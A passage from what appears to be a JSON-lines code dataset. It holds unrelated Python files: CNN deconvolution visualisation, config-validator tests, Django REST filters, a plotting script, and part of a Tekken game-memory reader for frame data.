self.plotfilter(conv_layer)\n \n return conv_layer\n \n def plotfilter(self, conv_layer):\n# \"\"\"\n \n\n# Parameters\n# ----\n# conv_layer = [?, 28, 28, 32] tensor\n# \"\"\"\n# \n filters=conv_layer.shape[3]\n plt.figure(1,figsize=(25,25))\n n_columns = 6\n n_rows = math.ceil(filters / n_columns) + 1\n for i in range(filters):\n plt.subplot(n_rows, n_columns, i+1)\n plt.title('Filter ' + str(i))\n plt.imshow(conv_layer[0,:,:,i], interpolation=\"nearest\")\n\n\n\n\n ###\n ### Nested Class: Deconvolutional Neural Network (CNN) for MNIST\n ###\n class DeconvData2:\n \n def __init__( self, outer, session, inputImage, inputLabel ):\n\n \t# data placeholders\n \t#self.inputImage = tf.placeholder(tf.float32, [None, inDim], name='x')\n \t#self.inputLabel = tf.placeholder(tf.float32, [None, outDim], name='y')\n\n \t# instantiate outer class in inner class\n self.cnn = outer\n self.sess = session\n\n activations1 = self.calculateActivations( inputImage, inputLabel, 1 )\n self.deconv1 = self.deconvLayer1( inputImage, inputLabel, activations1 )\n activations2 = self.calculateActivations(inputImage, inputLabel, 2)\n self.deconv2 = self.deconvLayer2( inputImage, inputLabel, activations2 )\n activations3 = self.calculateActivations( inputImage, inputLabel, 3 ) \n self.deconv3 = self.deconvLayer3( inputImage, inputLabel, activations3 )\n\n\n def deconvLayer1( self, inputImage, inputLabel, activations1 ):\n\n \t#\n \t## Deconvoluting 1st layer\n \t##\n \n # get activations for layer 1\n #activations1 = self.calculateActivations( inputImage, inputLabel, 1 )\n\n # convert from array to tensor\n act1_tf = tf.convert_to_tensor( activations1, np.float32 )\n\n # unpool\n unPool1 = self.unpool( act1_tf )\n\n # unrelu\n unRelu1 = tf.nn.relu( unPool1 )\n\n \t# deconvolute (filter)\n unConv1 = tf.nn.conv2d_transpose( # check dimensions\n \t #activations1,\n unRelu1,\n self.cnn.W_c1,\n output_shape = [ inputImage.shape[0], self.cnn.n_in, self.cnn.n_in, self.cnn.nChannels ],\n strides = [1, 1, 1, 1],\n padding = \"SAME\" )\n\n return unConv1\n\n\n def deconvLayer2( self, inputImage, inputLabel, activations2 ):\n\n\n ##\n ## Deconvoluting 2nd layer\n ##\n\n # get activations for layer 2\n #activations2 = self.calculateActivations(inputImage, inputLabel, 2)\n\n # convert from array to tensor\n act1_tf = tf.convert_to_tensor( activations2, np.float32 )\n\n # 1st unpool\n unPool1 = self.unpool( act1_tf )\n\n # 1st unrelu\n unRelu1 = tf.nn.relu( unPool1 )\n\n # 1st deconvolute (filter)\n outputShape1 = 
int(self.cnn.n_in/self.cnn.filterSizePool1)\n unConv1 = tf.nn.conv2d_transpose( \n #activations1,\n unRelu1,\n self.cnn.W_c2,\n output_shape = [ inputImage.shape[0], outputShape1, outputShape1, self.cnn.nFiltersConv1],\n strides = [1, 1, 1, 1],\n padding = \"SAME\" )\n\n # 2nd unpool\n unPool2 = self.unpool( unConv1 )\n\n # 2nd relu\n unRelu2 = tf.nn.relu( unPool2 )\n\n # 2nd deconvolute (filter)\n unConv2 = tf.nn.conv2d_transpose( \n #activations1,\n unRelu2,\n self.cnn.W_c1,\n output_shape = [ inputImage.shape[0], self.cnn.n_in, self.cnn.n_in, self.cnn.nChannels],\n strides = [1, 1, 1, 1],\n padding = \"SAME\" )\n\n return unConv2\n\n\n def deconvLayer3( self, inputImage, inputLabel, activations3 ):\n\n\n ##\n ## Deconvoluting 3rd layer\n ##\n\n # get activations for layer 3\n #activations3 = self.calculateActivations(inputImage, inputLabel, 3)\n\n # convert from array to tensor\n act1_tf = tf.convert_to_tensor( activations3, np.float32 )\n\n # 1st unpool\n unPool1 = self.unpool( act1_tf )\n\n # 1st unrelu\n unRelu1 = tf.nn.relu( unPool1 )\n\n # 1st deconvolute (filter)\n outputShape1 = int((self.cnn.n_in/self.cnn.filterSizePool2)/self.cnn.filterSizePool1)\n unConv1 = tf.nn.conv2d_transpose( \n #activations1,\n unRelu1,\n self.cnn.W_c3,\n #output_shape = [ inputImage.shape[0], outputShape1, outputShape1, self.cnn.nFiltersConv1],\n output_shape = [ inputImage.shape[0], outputShape1, outputShape1, self.cnn.nFiltersConv2],\n strides = [1, 1, 1, 1],\n padding = \"SAME\" )\n\n\n # 2nd unpool\n unPool2 = self.unpool( unConv1 )\n\n # 2nd relu\n unRelu2 = tf.nn.relu( unPool2 )\n\n # 2nd deconvolute (filter)\n outputShape2 = int(self.cnn.n_in/self.cnn.filterSizePool1)\n unConv2 = tf.nn.conv2d_transpose( \n #activations1,\n unRelu2,\n self.cnn.W_c2,\n #output_shape = [ inputImage.shape[0], outputShape2, outputShape2, self.cnn.nChannels],\n output_shape = [ inputImage.shape[0], outputShape2, outputShape2, self.cnn.nFiltersConv1],\n strides = [1, 1, 1, 1],\n padding = \"SAME\" )\n\n\n # 3rd unpool\n unPool3 = self.unpool( unConv2 )\n\n # 3rd relu\n unRelu3 = tf.nn.relu( unPool3 )\n\n # 3rd deconvolute (filter)\n unConv3 = tf.nn.conv2d_transpose( \n #activations1,\n unRelu3,\n self.cnn.W_c1,\n output_shape = [ inputImage.shape[0], self.cnn.n_in, self.cnn.n_in, self.cnn.nChannels],\n strides = [1, 1, 1, 1],\n padding = \"SAME\" )\n\n return unConv3\n\n #Returns the random filter activation for layer 1\n def bestActivation1( self, inputImage, inputLabel, n_best=3, k=3):\n activations_layer1=self.calculateActivations( inputImage, inputLabel, 1)\n \n random.seed(3)\n filters_layer1=random.sample(range(activations_layer1.shape[-1]),k)\n j=0\n best_index=np.zeros([k,n_best])\n \n all_isolations = np.zeros([k, n_best, 64, 64, 1])\n \n \n \n for i in filters_layer1:\n isolated=activations_layer1.copy()[:,:,:,i]\n \n Norm1 = np.linalg.norm(isolated,axis=(1,2))\n #Norm2 = np.linalg.norm(Norm1, axis=1)\n \n best = np.argsort(Norm1)[-n_best:]\n best_index[j,:]=best\n \n \n all_isolations[j,:,:,:,] = np.reshape(isolated[best,],(n_best,64,64,1))\n j=j+1\n \n \n \n return all_isolations,best_index, filters_layer1\n \n #Returns the random filter activation for layer 2\n def bestActivation2( self, inputImage, inputLabel, n_best=3, k=3):\n activations_layer2=self.calculateActivations( inputImage, inputLabel, 2)\n random.seed(3)\n filters_layer2=random.sample(range(activations_layer2.shape[-1]),k)\n j=0\n best_index=np.zeros([k,n_best])\n \n all_isolations = np.zeros([k, n_best, 32, 32, 1])\n 
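# The self.unpool calls used by these deconv layers double every spatial dimension
# by copying each activation into a 2x2 block (nearest-neighbour upsampling). A
# behaviourally equivalent NumPy sketch of that step (illustration only, not the
# original TF code):
import numpy as np

x = np.arange(4, dtype=np.float32).reshape(1, 2, 2, 1)  # [batch, h, w, ch]
up = np.repeat(np.repeat(x, 2, axis=1), 2, axis=2)      # h and w both double
print(up[0, :, :, 0])
# [[0. 0. 1. 1.]
#  [0. 0. 1. 1.]
#  [2. 2. 3. 3.]
#  [2. 2. 3. 3.]]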
#print(activations_layer2.shape)\n \n \n for i in filters_layer2:\n isolated=activations_layer2.copy()[:,:,:,i]\n \n Norm1 = np.linalg.norm(isolated,axis=(1,2))\n #Norm2 = np.linalg.norm(Norm1, axis=1)\n \n best = np.argsort(Norm1)[-n_best:]\n best_index[j,:]=best\n \n isolated=np.reshape(isolated[best,],(n_best,32,32,1))\n \n all_isolations[j,:,:,:,] = isolated\n j=j+1\n \n \n \n return all_isolations,best_index, filters_layer2\n \n #Returns the random filter activation for layer 3\n def bestActivation3( self, inputImage, inputLabel, n_best=3, k=3):\n activations_layer3=self.calculateActivations( inputImage, inputLabel, 3)\n random.seed(3)\n filters_layer3=random.sample(range(activations_layer3.shape[-1]),k)\n j=0\n best_index=np.zeros([k,n_best])\n \n all_isolations = np.zeros([k, n_best, 16, 16, 1])\n #print(activations_layer2.shape)\n \n \n for i in filters_layer3:\n isolated=activations_layer3.copy()[:,:,:,i]\n \n Norm1 = np.linalg.norm(isolated,axis=(1,2))\n #Norm2 = np.linalg.norm(Norm1, axis=1)\n \n best = np.argsort(Norm1)[-n_best:]\n best_index[j,:]=best\n \n isolated=np.reshape(isolated[best,],(n_best,16,16,1))\n \n all_isolations[j,:,:,:,] = isolated\n j=j+1\n \n \n \n return all_isolations,best_index, filters_layer3\n \n #Returns de deconvoluted layer1 as numpy array, with isolated nodes,\n #and save the images on the \"img\" folder\n def displayFeatures1( self, inputImage, inputLabel, n_best = 3, k = 3):\n\n #\n ## Deconvoluting 1st layer\n ##\n \n # get activations for layer 1\n activations1 = self.calculateActivations( inputImage, inputLabel, 1 )\n random.seed(3)\n filters = random.sample(range(activations1.shape[-1]), k)\n aux = activations1.shape[0] - n_best\n \n all_isolations = np.zeros([k, n_best, 128, 128, 3])\n j = 0\n best_index = np.zeros([k, n_best])\n \n for i in filters:\n # Isolate filters\n print(\"Deconvoluting Layer 1 Filter: {}\".format(i))\n isolated = activations1.copy()\n isolated[:,:,:,:i] = 0\n isolated[:,:,:,i+1:] = 0\n\n Norm1 = np.linalg.norm(isolated[:,:,:,i], axis = (1, 2))\n #Norm2 = np.linalg.norm(Norm1, axis = 1)\n\n best = np.argsort(Norm1)[-n_best:]\n\n # devonvolute\n unConv1 = self.deconvLayer1( inputImage, inputLabel, isolated )\n \n u = unConv1.eval()\n \n u = u[best,]\n best_index[j,:] = best\n \n #imsave(\"img/Deconv1_Node_{}_of_Image1.jpg\".format(i), u[0,:,:,:])\n \n all_isolations[j,:,:,:,:] = u\n j = j + 1\n \n return all_isolations, best_index, filters\n\n\n def displayFeatures2( self, inputImage, inputLabel, n_best = 3, k = 3):\n\n ##\n ## Deconvoluting 2nd layer\n ##\n\n # get activations for layer 2\n activations2 = self.calculateActivations(inputImage, inputLabel, 2)\n random.seed(3)\n filters = random.sample(range(activations2.shape[-1]), k)\n aux = activations2.shape[0] - n_best\n \n all_isolations = np.zeros([k, n_best, 128, 128, 3])\n j = 0\n best_index = np.zeros([k, n_best])\n \n for i in filters:\n # Isolate filters\n print(\"Deconvoluting Layer 2 Filter: {}\".format(i))\n isolated = activations2.copy()\n isolated[:,:,:,:i] = 0\n isolated[:,:,:,i+1:] = 0\n \n Norm1 = np.linalg.norm(isolated[:,:,:,i], axis = (1, 2))\n #Norm2 = np.linalg.norm(Norm1, axis = 1)\n \n best = np.argsort(Norm1)[-n_best:]\n \n # deconvolute\n unConv2 = self.deconvLayer2( inputImage, inputLabel, isolated )\n \n u = unConv2.eval()\n \n u = u[best,]\n best_index[j,:] = best\n \n #imsave(\"img/Deconv2_Node_{}_of_Image1.jpg\".format(i), u[0,:,:,:])\n \n all_isolations[j,:,:,:,:] = u\n j = j + 1\n \n \n return all_isolations, best_index, filters\n\n\n 
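# The bestActivation/displayFeatures helpers all rank images by the norm of a single
# filter's activation map and keep the strongest n_best. That selection step in
# isolation (random stand-in activations, not real network output):
import numpy as np

acts = np.random.rand(10, 8, 8)            # 10 images, one 8x8 activation map each
norms = np.linalg.norm(acts, axis=(1, 2))  # Frobenius norm per image
print(np.argsort(norms)[-3:])              # indices of the 3 strongest responses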
def displayFeatures3( self, inputImage, inputLabel, n_best = 3, k = 3):\n\n ##\n ## Deconvoluting 3rd layer\n ##\n\n # get activations for layer 3\n activations3 = self.calculateActivations(inputImage, inputLabel, 3)\n random.seed(3)\n filters = random.sample(range(activations3.shape[-1]), k)\n aux = activations3.shape[0] - n_best\n \n all_isolations = np.zeros([k, n_best, 128, 128, 3])\n j = 0\n best_index = np.zeros([k, n_best])\n \n for i in filters:\n # Isolate filters (iterate the sampled filter indices themselves, as in\n # displayFeatures1/2; range(filters) would raise TypeError on a list)\n if i % 5 == 0:\n print(\"Deconvoluting Layer 3 activation number: {}\".format(i))\n isolated = activations3.copy()\n isolated[:,:,:,:i] = 0\n isolated[:,:,:,i+1:] = 0\n \n Norm1 = np.linalg.norm(isolated[:,:,:,i], axis = (1, 2))\n #Norm2 = np.linalg.norm(Norm1, axis = 1)\n \n best = np.argsort(Norm1)[-n_best:]\n \n # deconvolute\n unConv3 = self.deconvLayer3( inputImage, inputLabel, isolated )\n \n u = unConv3.eval()\n \n u = u[best,]\n best_index[j,:] = best\n \n #imsave(\"img/Deconv3_Node_{}_of_Image1.jpg\".format(i), u[0,:,:,:])\n \n all_isolations[j,:,:,:,:] = u\n j = j + 1\n \n \n return all_isolations, best_index, filters \n\n\n # calculate activations for layer (1, 2 or 3)\n def calculateActivations( self, inputImage, inputLabel, layer ):\n\n if( layer == 1 ):\n return self.cnn.pool1.eval(feed_dict={self.cnn.x: np.reshape(inputImage,[-1,int(self.cnn.n_in*self.cnn.n_in*self.cnn.nChannels)])})\n elif( layer == 2 ):\n return self.cnn.pool2.eval(feed_dict={self.cnn.x: np.reshape(inputImage,[-1,int(self.cnn.n_in*self.cnn.n_in*self.cnn.nChannels)])})\n else:\n return self.cnn.pool3.eval(feed_dict={self.cnn.x: np.reshape(inputImage,[-1,int(self.cnn.n_in*self.cnn.n_in*self.cnn.nChannels)])})\n \n def calculateActivationsFeature( self, inputImage, inputLabel, layer ):\n\n if( layer == 1 ):\n return self.cnn.relu1.eval(feed_dict={self.cnn.x: np.reshape(inputImage,[-1,int(self.cnn.n_in*self.cnn.n_in*self.cnn.nChannels)])})\n elif( layer == 2 ):\n return self.cnn.relu2.eval(feed_dict={self.cnn.x: np.reshape(inputImage,[-1,int(self.cnn.n_in*self.cnn.n_in*self.cnn.nChannels)])})\n else:\n return self.cnn.relu3.eval(feed_dict={self.cnn.x: np.reshape(inputImage,[-1,int(self.cnn.n_in*self.cnn.n_in*self.cnn.nChannels)])})\n\n\n def getDeconv( self ):\n return self.deconv1, self.deconv2, self.deconv3\n\n # method to unpool (adapted from kvfrans; paper link in the docstring)\n def unpool( self, value ):\n \"\"\"N-dimensional version of the unpooling operation from\n https://www.robots.ox.ac.uk/~vgg/rg/papers/Dosovitskiy_Learning_to_Generate_2015_CVPR_paper.pdf\n\n :param value: A Tensor of shape [b, d0, d1, ..., dn, ch]\n :return: A Tensor of shape [b, 2*d0, 2*d1, ..., 2*dn, ch]\n \"\"\"\n #with tf.name_scope(name) as scope:\n sh = value.get_shape().as_list()\n dim = len(sh[1:-1])\n out = (tf.reshape(value, [-1] + sh[-dim:]))\n for i in range(dim, 0, -1):\n out = tf.concat( [out, out], i)\n out_size = [-1] + [s * 2 for s in sh[1:-1]] + [sh[-1]]\n out = tf.reshape(out, out_size)#, name=scope)\n return out\n","sub_path":"lib/ConvDeconvDataSet2.py","file_name":"ConvDeconvDataSet2.py","file_ext":"py","file_size_in_byte":24180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"573350357","text":"import pkg_resources\nimport pytest\n\nfrom yass.config.validator import Validator\n\n\ndef test_rejects_dict_with_missing_required_sections():\n d = dict(a=1, b=2)\n required_sections = ['a', 'b', 'c']\n optional_sections = dict(d=4)\n validator = Validator(d, required_sections, optional_sections)\n\n 
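# These tests assert on exception text by capturing with pytest.raises and comparing
# str(excinfo.value); the bare pattern in isolation (a generic sketch with a made-up
# function and message, runnable under pytest):
import pytest

def boom():
    raise ValueError('something went wrong')

def test_boom_message():
    with pytest.raises(ValueError) as excinfo:
        boom()
    assert str(excinfo.value) == 'something went wrong'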
with pytest.raises(ValueError):\n validator.validate()\n\n\ndef test_rejects_dict_with_invalid_sections():\n d = dict(a=1, b=2, c=3, e=5, f=6)\n required_sections = ['a', 'b', 'c']\n optional_sections = dict(d=4)\n validator = Validator(d, required_sections, optional_sections,\n allow_extras=False)\n message = 'The following sections are invalid: e, f'\n\n with pytest.raises(ValueError) as exception:\n validator.validate()\n\n assert str(exception.value) == message\n\n\ndef test_fills_optional_missing_sections():\n d = dict(a=1, b=2, c=3)\n required_sections = ['a', 'b', 'c']\n optional_sections = dict(d=4)\n validator = Validator(d, required_sections, optional_sections)\n\n validated = validator.validate()\n\n assert validated['d'] == 4\n\n\ndef test_validates_fields_type():\n d = dict(a=dict(a_num='not a num', a_cat='val', a_str='a str'), b=2, c=3)\n required_sections = ['a', 'b', 'c']\n optional_sections = dict(d=4)\n fields_validator = dict(a=dict(a_num=dict(type='int'),\n a_cat=dict(type='str', values='val'),\n a_str=dict(tyle='str')))\n\n validator = Validator(d, required_sections, optional_sections,\n fields_validator)\n\n message = 'Value in \"a.a_num\" must be \"int\" but it is \"str\"'\n\n with pytest.raises(ValueError) as exception:\n validator.validate()\n\n assert str(exception.value) == message\n\n\ndef test_validates_fields_values():\n d = dict(a=dict(a_num=1, a_cat='not val', a_str='a str'), b=2, c=3)\n required_sections = ['a', 'b', 'c']\n optional_sections = dict(d=4)\n fields_validator = dict(a=dict(a_num=dict(type='int'),\n a_cat=dict(type='str', values=['val',\n 'val2']),\n a_str=dict(tyle='str')))\n\n validator = Validator(d, required_sections, optional_sections,\n fields_validator)\n\n message = 'Value in \"a.a_cat\" is invalid, valid values are \"val, val2\"'\n\n with pytest.raises(ValueError) as exception:\n validator.validate()\n\n assert str(exception.value) == message\n\n\ndef test_can_validate_with_custom_rules():\n d = dict(a=dict(a_path='file_in_assets_model.txt'))\n required_sections = ['a']\n optional_sections = dict(b=1)\n fields_validator = dict(a=dict(a_path=dict(function='expand_asset_model')))\n\n validator = Validator(d, required_sections, optional_sections,\n fields_validator)\n validated = validator.validate()\n\n path = 'assets/models/file_in_assets_model.txt'\n path_absolute = pkg_resources.resource_filename('yass', path)\n\n assert path_absolute == validated['a']['a_path']\n","sub_path":"tests/test_validator.py","file_name":"test_validator.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"516868798","text":"from swarms.model import EnvironmentModel\nfrom swarms.agent import SwarmAgent\n\nimport argparse\n\n## Global variables for width and height\nwidth = 50\nheight = 50\n\ndef main():\n \n env = EnvironmentModel(10, width, height)\n\n for i in range(1000):\n env.step()\n\n for agent in env.schedule.agents:\n print (agent.unique_id, agent.wealth)\n\nif __name__ == '__main__':\n main()","sub_path":"examples/geese/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"96415985","text":"#\n# Copyright (C) 2018-2022 S[&]T, The Netherlands.\n#\n\nfrom __future__ import absolute_import, division, print_function\n\nimport logging\nfrom copy import copy\n\nfrom 
django.conf import settings\nfrom django.utils.module_loading import import_string\nfrom django.db.models import fields as django_fields\nfrom django.db.models import Lookup\nfrom django.core.exceptions import FieldDoesNotExist\nfrom rest_framework.filters import OrderingFilter\nfrom django_filters import rest_framework as filters\nfrom django.contrib.gis.db.models import GeometryField\nfrom rest_framework_gis.filters import GeometryFilter\n\nfrom muninn_django.naiveutcdatetime.modelfields import NaiveDateTimeField\nfrom muninn_django.naiveutcdatetime.forms import NaiveUtcIsoDateTimeFilter\n\n\nlogger = logging.getLogger(__name__)\n\n\n@django_fields.Field.register_lookup\nclass NotEqual(Lookup):\n '''django \"__ne\" custom lookup'''\n lookup_name = 'ne'\n\n def as_sql(self, compiler, connection):\n lhs, lhs_params = self.process_lhs(compiler, connection)\n rhs, rhs_params = self.process_rhs(compiler, connection)\n params = lhs_params + rhs_params\n return '%s <> %s' % (lhs, rhs), params\n\n\nclass CharInFilter(filters.BaseInFilter, filters.CharFilter):\n pass\n\n\nclass ProductFilter(filters.FilterSet):\n\n # `in` implicitly supports `exact` :)\n # `distinct=True` is required to remove duplicates that the underlying inner join produces\n tag = CharInFilter(field_name='tags__tag', lookup_expr='in', distinct=True)\n\n source_product = filters.CharFilter(field_name='source_products__uuid', lookup_expr='exact')\n derived_product = filters.CharFilter(field_name='derived_products__uuid', lookup_expr='exact')\n\n class Meta(object):\n model = None # to be overriden\n filter_overrides = {\n NaiveDateTimeField: {\n 'filter_class': NaiveUtcIsoDateTimeFilter,\n },\n GeometryField: {\n 'filter_class': GeometryFilter,\n }\n }\n\n\ndef _get_filters(model_class, preffix=None, disabled_lookups=None):\n result = {}\n for field in model_class._meta.fields:\n filter_def = list(type(field).get_lookups().keys())\n if filter_def and field.name != '_core':\n name = '%s__%s' % (preffix, field.name) if preffix else field.name\n filter_def = [x for x in filter_def if not x in disabled_lookups]\n result[name] = filter_def\n\n return result\n\n\nclass ProductFilterFactory(object):\n @classmethod\n def get(cls, archive, model_class):\n name = 'ProductFilter'\n\n disabled_lookups = settings.MUNINN[archive].get('disabled_lookups', [])\n meta_fields = _get_filters(model_class, disabled_lookups=disabled_lookups)\n for ns, ns_class_path in settings.MUNINN[archive]['models'].items():\n if ns != 'core':\n ns_class = import_string(ns_class_path)\n meta_fields.update(_get_filters(ns_class, preffix=ns, disabled_lookups=disabled_lookups))\n\n meta_body = {}\n meta_body['__module__'] = '%s.%s.%s' % (__name__, archive, name)\n meta_body['model'] = model_class\n meta_body['fields'] = meta_fields\n meta_class = type('Meta', (ProductFilter.Meta, ), meta_body)\n\n body = {}\n body['__module__'] = '%s.%s' % (__name__, archive)\n body['Meta'] = meta_class\n newclass = type(name, (ProductFilter, ), body)\n\n return newclass\n\n\nclass RelatedOrderingFilter(OrderingFilter):\n \"\"\"\n\n See: https://github.com/encode/django-rest-framework/issues/1005\n\n Extends OrderingFilter to support ordering by fields in related models\n using the Django ORM __ notation\n \"\"\"\n def is_valid_field(self, model, field):\n \"\"\"\n Return true if the field exists within the model (or in the related\n model specified using the Django ORM __ notation)\n \"\"\"\n components = field.split('__', 1)\n try:\n field = model._meta.get_field(components[0])\n\n 
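# The register_lookup decorator above exposes a __ne lookup on every model field;
# a hypothetical usage sketch (Product is an invented model, not part of this
# project, and this assumes a configured Django app):
# Product.objects.filter(status__ne='archived')
# -> SQL: ... WHERE "product"."status" <> 'archived'   (via NotEqual.as_sql above)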
if isinstance(field, django_fields.reverse_related.OneToOneRel):\n return self.is_valid_field(field.related_model, components[1])\n\n # reverse relation\n if isinstance(field, django_fields.reverse_related.ForeignObjectRel):\n return self.is_valid_field(field.model, components[1])\n\n # foreign key\n if field.remote_field and len(components) == 2:\n return self.is_valid_field(field.related_model, components[1])\n return True\n except FieldDoesNotExist:\n return False\n\n def remove_invalid_fields(self, queryset, fields, ordering, view):\n return [term for term in fields\n if self.is_valid_field(queryset.model, term.lstrip('-'))]\n","sub_path":"muninn_django/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":4797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"252622870","text":"import matplotlib \nmatplotlib.use('Agg')\nimport pandas as pd\nimport pylab as plt\nimport numpy as np\nfig = plt.figure()\nax = fig.add_axes([0.15, 0.1, 0.8, 0.8])\ndf = pd.read_table('DCM-Exon-Coverage-Table-Genes', header=0)\ndf2 = np.log2(df.ix[:, -3:]+1)\n#df2 = df.ix[:, -3:]\ndf2.plot(kind='hist', stacked=True, ax = ax, color=['r','g','b'])\nax.set_xlabel('Coverage, log2(x+1)')\nax.set_ylabel('Number of Exons')\nax.set_title('3574 Exons of 95 Genes')\nplt.savefig('ExonCoverage.pdf')\n\n","sub_path":"DCM/12-CheckCoverageOfSomeGenes/12-hist.py","file_name":"12-hist.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"2726222","text":"import ctypes\nimport enum\nimport struct\n\nfrom . import GameSnapshot, MoveInfoEnums\nfrom game_parser import MovelistParser\nfrom misc import ConfigReader, Flags\nfrom misc.Windows import w as Windows\n\n# I have no idea how this file works\n\ngame_string = 'TekkenGame-Win64-Shipping.exe'\n\nclass AddressType(enum.Enum):\n _float = 0\n _64bit = 1\n _string = 2\n\nclass AcquireState(enum.Enum):\n need_pid = 0\n need_module = 1\n need_names = 2\n has_everything = 3\n\nclass GameReader:\n def __init__(self):\n self.acquire_state = AcquireState.need_pid\n self.pid = None\n self.module_address = 0\n self.is_player_player_one = True # default\n self.c = ConfigReader.ConfigReader('memory_address')\n self.player_data_pointer_offset = self.c['MemoryAddressOffsets']['player_data_pointer_offset']\n self.p1_movelist_parser = None\n self.p2_movelist_parser = None\n\n def get_value_from_address(self, process_handle, address, address_type):\n if address_type is AddressType._string:\n data = ctypes.create_string_buffer(16)\n bytes_read = ctypes.c_ulonglong(16)\n elif address_type is AddressType._64bit:\n data = ctypes.c_ulonglong()\n bytes_read = ctypes.c_ulonglong()\n else:\n data = ctypes.c_ulong()\n bytes_read = ctypes.c_ulonglong(4)\n\n successful = Windows.read_process_memory(process_handle, address, ctypes.byref(data), ctypes.sizeof(data), ctypes.byref(bytes_read))\n if not successful:\n e = Windows.get_last_error()\n # known problem of failing to read_process_memory\n # when not in a fight\n if not (e == 299 and self.acquire_state == AcquireState.need_names):\n print(\"read_process_memory Error: Code %s\" % e)\n return 0\n\n value = data.value\n\n if address_type is AddressType._float:\n return struct.unpack(\"= len(last_eight_frames):\n print(\"ERROR: requesting %s frame of %s long rollback frame\" % (rollback_frame, len(last_eight_frames)))\n return None\n\n best_frame_count, player_data_second_address = 
sorted(last_eight_frames, key=lambda x: -x[0])[rollback_frame]\n\n player_data_frame = self.get_block_of_data(process_handle, player_data_second_address, self.c['MemoryAddressOffsets']['rollback_frame_offset'])\n\n p1_dict = {}\n p2_dict = {}\n\n self.read_from_addresses(p1_dict, p2_dict, player_data_frame)\n\n p1_snapshot = GameSnapshot.PlayerSnapshot(p1_dict)\n p2_snapshot = GameSnapshot.PlayerSnapshot(p2_dict)\n\n facing = self.get_value_from_data_block(player_data_frame, self.c['GameDataAddress']['facing'])\n\n if self.acquire_state == AcquireState.need_names and p1_snapshot.character_name != MoveInfoEnums.CharacterCodes.NOT_YET_LOADED.name and p2_snapshot.character_name != MoveInfoEnums.CharacterCodes.NOT_YET_LOADED.name:\n self.reacquire_names(process_handle)\n\n return GameSnapshot.GameSnapshot(p1_snapshot, p2_snapshot, best_frame_count, facing, self.is_player_player_one)\n\n def reacquire_module(self):\n print(\"Trying to acquire Tekken library in pid: %s\" % self.pid)\n self.module_address = Windows.get_module_address(self.pid, game_string)\n if self.module_address is None:\n print(\"%s not found. Likely wrong process id. Reacquiring pid.\" % game_string)\n self.pid = None\n elif self.module_address != self.c['MemoryAddressOffsets']['expected_module_address']:\n print(\"Unrecognized location for %s module. Tekken.exe Patch? Wrong process id?\" % game_string)\n else:\n print(\"Found %s\" % game_string)\n self.acquire_state = AcquireState.need_names\n\n def get_player_data_base_address(self, process_handle):\n addresses = split_str_to_hex(self.player_data_pointer_offset)\n address = self.module_address\n for i, offset in enumerate(addresses):\n address += offset\n if i + 1 < len(addresses):\n address = self.get_value_from_address(process_handle, address, AddressType._64bit)\n else:\n address = self.get_value_from_address(process_handle, address, None)\n return address\n\n def get_last_eight_frames(self, process_handle, player_data_base_address):\n last_eight_frames = []\n\n second_address_base = self.get_value_from_address(process_handle, player_data_base_address, AddressType._64bit)\n offset = self.c['MemoryAddressOffsets']['rollback_frame_offset']\n frame_count = self.c['GameDataAddress']['frame_count']\n for i in range(8): # for rollback purposes, there are 8 copies of the game state, each one updatating once every 8 frames\n potential_second_address = second_address_base + (i * offset)\n potential_frame_count = self.get_value_from_address(process_handle, potential_second_address + frame_count, None)\n last_eight_frames.append((potential_frame_count, potential_second_address))\n return last_eight_frames\n\n def read_from_addresses(self, p1_dict, p2_dict, player_data_frame):\n for data_type, value in self.c['PlayerDataAddress'].items():\n p1_value = self.get_value_from_data_block(player_data_frame, value, 0, self.is_data_a_float(data_type))\n p2_value = self.get_value_from_data_block(player_data_frame, value, self.c['MemoryAddressOffsets']['p2_data_offset'], self.is_data_a_float(data_type))\n address = 'PlayerDataAddress.%s' % data_type\n p1_dict[address] = p1_value\n p2_dict[address] = p2_value\n\n for data_type, value in self.c['EndBlockPlayerDataAddress'].items():\n p1_value = self.get_value_from_data_block(player_data_frame, value)\n p2_value = self.get_value_from_data_block(player_data_frame, value, self.c['MemoryAddressOffsets']['p2_end_block_offset'])\n address = 'EndBlockPlayerDataAddress.%s' % data_type\n p1_dict[address] = p1_value\n p2_dict[address] = p2_value\n\n 
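# The rollback lookup above keeps eight ring-buffer snapshots, sorts them
# newest-first by frame count, and indexes the requested rollback depth; the same
# selection in isolation (frame counts and addresses invented):
frames = [(101, 0x1000), (96, 0x2000), (103, 0x3000)]
print(sorted(frames, key=lambda x: -x[0])[0])  # (103, 12288) -- the newest snapshot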
position_offset = 32 # our xyz coordinate is 32 bytes, a 4 byte x, y, and z value followed by five 4 byte values that don't change\n for axis, starting_address in ((k, v) for k, v in self.c['PlayerDataAddress'].items() if k in ('x', 'y', 'z')):\n p1_coord_array = []\n p2_coord_array = []\n for i in range(23):\n address = starting_address + (i * position_offset)\n p1_coord_array.append(self.get_value_from_data_block(player_data_frame, address, 0, is_float=True))\n p2_coord_array.append(self.get_value_from_data_block(player_data_frame, address, self.c['MemoryAddressOffsets']['p2_data_offset'], is_float=True))\n address = 'PlayerDataAddress.%s' % axis\n p1_dict[address] = p1_coord_array\n p2_dict[address] = p2_coord_array\n\n p1_dict['movelist_parser'] = self.p1_movelist_parser\n p2_dict['movelist_parser'] = self.p2_movelist_parser\n\n def reacquire_names(self, process_handle):\n if not Flags.Flags.no_movelist:\n opponent_side = self.get_value_at_end_of_pointer_trail(process_handle, \"OPPONENT_SIDE\", False)\n self.is_player_player_one = (opponent_side == 1)\n\n p1_movelist_block, p1_movelist_address = self.populate_movelists(process_handle, \"P1_Movelist\")\n p2_movelist_block, p2_movelist_address = self.populate_movelists(process_handle, \"P2_Movelist\")\n\n self.p1_movelist_parser = MovelistParser.MovelistParser(p1_movelist_block, p1_movelist_address)\n self.p2_movelist_parser = MovelistParser.MovelistParser(p2_movelist_block, p2_movelist_address)\n print(\"acquired movelists\")\n\n self.acquire_state = 